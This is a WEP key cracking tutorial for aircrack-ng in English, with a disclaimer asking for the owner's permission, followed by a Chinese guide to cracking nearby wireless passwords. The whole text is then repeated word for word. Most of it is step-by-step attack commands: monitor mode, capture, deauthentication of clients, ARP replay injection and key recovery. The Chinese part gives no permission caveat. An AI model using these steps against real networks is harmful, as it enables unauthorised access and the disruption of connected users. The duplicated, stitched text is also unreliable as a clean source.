Before you continue to follow this tutorial, you might want to take a
look at pyCracker, a useful tool which – hopefully – will make the
whole process a littler simpler for you.
This HOWTO is widely based on Aircrack’s own documentation. In addition you’ll find the latest version of “Aircrack Next Generation” here and Aircrack-PTW here.
Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.
DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network’s security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:
1. Brute force attack
2. Dictionary attack
3. Statistical attack
By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.
HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:
1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)
I recommend “Linksys WUSB54G V4.0″ as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.
DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.
PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
4. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.
COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.
* 1. Enable monitoring with “airmon-ng” (screenshot #1):
Quote:
sudo airmon-ng start
* 2. Packet capturing with “airodump-ng” (screenshot #2):
Quote:
sudo airodump-ng –channel –write
Alternatively, try this (to collect data from target network only and hence increase performance):
Quote:
sudo airodump-ng –channel –bssid 00:09:5B:D7:43:A8 –write
NOTE:
–channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
–bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
–write… Preferred file name; mandatory field (in our case).
* 3.1. Now check if MAC filtering is enabled or turned off:
Quote:
sudo aireplay-ng -1 0 -e -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS
NOTE:
-1… ’0′ deauthenticates all clients.
-e… ESSID of target access point.
-a… MAC address of target access point.
-h… MAC address of your choice.
* 3.2. If the resulting output looks like this…
Quote:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
…then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.
>> No MAC filtering << * 4. Packet Re-injection with "aireplay-ng" (screenshot #4): Quote: sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS
You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).
Continue with #6.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… MAC address of your choice.
>> MAC filtering << * 4. Deauthentication with "aireplay-ng" (screenshot #3): Quote: sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00
NOTE:
-0… Number of deauthentication attempts.
-a… MAC address of target access point.
-c… Client MAC address.
* 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
Quote:
sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00
You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… Client MAC address.
* 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
Aircrack-ng:
Quote:
sudo aircrack-ng .cap
Aircrack-PTW:
Quote:
./aircrack-ptw .cap
CAPTURING:
This is a summary based on information given here and there, respectively:
Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets
Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets
FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
----------------------------------
一款在UBUNTU系统下可以破解无线密码的利器-aircrack-ng的介绍
测试平台 Y450 T6600 2.1G ubuntu 10.04 成功
1.下载安装aircrack-ng,直接从源中安装的。
sudo apt-get install aircrack-ng
2.启动无线,这里奶牛需要说明一下,很多朋友的无线可能在windows系统中是禁用或者是系统自带的电源管理系统中未开启无线的,这种情况下需 要先在win状态下开启之后才能在ubuntu中开启无线。开启完成后进入ubuntu ,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。
3.准备工作完成,开始破解。开启终端①,
sudo airmon-ng start wlan0
sudo airodump -ng mon0
这时会看到无线的地址出现在屏幕上,这里有显示它们的mac地址以及所在频道。ok,ctrl+c退出,在这里我们选择类型为wep的无线为破解对 象。我们需要记录它所在的频道以及mac地址。
4.开启终端②
sudo airodump-ng -c 频道 –bssid 目标主机mac -w wep mon0
这里的wep为默认的存包文件的名字,可以更改。
5.开启终端③
sudo aireplay-ng -1 0 -a 目标mac -h 本机MAC mon0
(本机的mac可以开启一个新的终端用ifconfig -a来查询)
这时会有成功字样显示,如果没有显示可能就是目标不支持或者系统部稳定,需要更换目标了。显示成功后进行下步。
6.继续输入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标MAC -h 本机MAC mon0
此时终端②中的数据会增长很快,当数据到达5000的时候就可以破 解了。
7.开启终端 ④
sudo aircrack-ng wep*.cap
这时就开始破解了,如果你进行过多组,可能会有多组结果,你可以用数字123进行选择,如果不出意外你已经破解出来这组无线的密码了。
8.最后 sudo airmon-ng stop mon0结束监控过程
( sudo airomon-ng check可以查看你开启了多少监控,如果运行多组的时候可以查看后选择关闭)
This HOWTO is widely based on Aircrack’s own documentation. In addition you’ll find the latest version of “Aircrack Next Generation” here and Aircrack-PTW here.
Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.
DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network’s security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:
1. Brute force attack
2. Dictionary attack
3. Statistical attack
By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.
HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:
1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)
I recommend “Linksys WUSB54G V4.0″ as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.
DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.
PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. ’00:09:5B:D7:43:A8′ is the MAC address of my network, so you need to replace it with your own.
4. ’00:00:00:00:00:00′ is the MAC address of the target client, NOT that of your own wireless card.
COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.
* 1. Enable monitoring with “airmon-ng” (screenshot #1):
Quote:
sudo airmon-ng start
* 2. Packet capturing with “airodump-ng” (screenshot #2):
Quote:
sudo airodump-ng –channel –write
Alternatively, try this (to collect data from target network only and hence increase performance):
Quote:
sudo airodump-ng –channel –bssid 00:09:5B:D7:43:A8 –write
NOTE:
–channel… Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
–bssid… MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
–write… Preferred file name; mandatory field (in our case).
* 3.1. Now check if MAC filtering is enabled or turned off:
Quote:
sudo aireplay-ng -1 0 -e -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS
NOTE:
-1… ’0′ deauthenticates all clients.
-e… ESSID of target access point.
-a… MAC address of target access point.
-h… MAC address of your choice.
* 3.2. If the resulting output looks like this…
Quote:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
…then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.
>> No MAC filtering << * 4. Packet Re-injection with "aireplay-ng" (screenshot #4): Quote: sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS
You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address (‘MY:MA:CA:DD:RE:SS’).
Continue with #6.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… MAC address of your choice.
>> MAC filtering << * 4. Deauthentication with "aireplay-ng" (screenshot #3): Quote: sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00
NOTE:
-0… Number of deauthentication attempts.
-a… MAC address of target access point.
-c… Client MAC address.
* 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
Quote:
sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00
You’ll now see the number of data packets shooting up in ‘airodump-ng’. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… Client MAC address.
* 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
Aircrack-ng:
Quote:
sudo aircrack-ng .cap
Aircrack-PTW:
Quote:
./aircrack-ptw .cap
CAPTURING:
This is a summary based on information given here and there, respectively:
Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets
Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets
FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
----------------------------------
一款在UBUNTU系统下可以破解无线密码的利器-aircrack-ng的介绍
测试平台 Y450 T6600 2.1G ubuntu 10.04 成功
1.下载安装aircrack-ng,直接从源中安装的。
sudo apt-get install aircrack-ng
2.启动无线,这里奶牛需要说明一下,很多朋友的无线可能在windows系统中是禁用或者是系统自带的电源管理系统中未开启无线的,这种情况下需 要先在win状态下开启之后才能在ubuntu中开启无线。开启完成后进入ubuntu ,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。
3.准备工作完成,开始破解。开启终端①,
sudo airmon-ng start wlan0
sudo airodump -ng mon0
这时会看到无线的地址出现在屏幕上,这里有显示它们的mac地址以及所在频道。ok,ctrl+c退出,在这里我们选择类型为wep的无线为破解对 象。我们需要记录它所在的频道以及mac地址。
4.开启终端②
sudo airodump-ng -c 频道 –bssid 目标主机mac -w wep mon0
这里的wep为默认的存包文件的名字,可以更改。
5.开启终端③
sudo aireplay-ng -1 0 -a 目标mac -h 本机MAC mon0
(本机的mac可以开启一个新的终端用ifconfig -a来查询)
这时会有成功字样显示,如果没有显示可能就是目标不支持或者系统部稳定,需要更换目标了。显示成功后进行下步。
6.继续输入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标MAC -h 本机MAC mon0
此时终端②中的数据会增长很快,当数据到达5000的时候就可以破 解了。
7.开启终端 ④
sudo aircrack-ng wep*.cap
这时就开始破解了,如果你进行过多组,可能会有多组结果,你可以用数字123进行选择,如果不出意外你已经破解出来这组无线的密码了。
8.最后 sudo airmon-ng stop mon0结束监控过程
( sudo airomon-ng check可以查看你开启了多少监控,如果运行多组的时候可以查看后选择关闭)
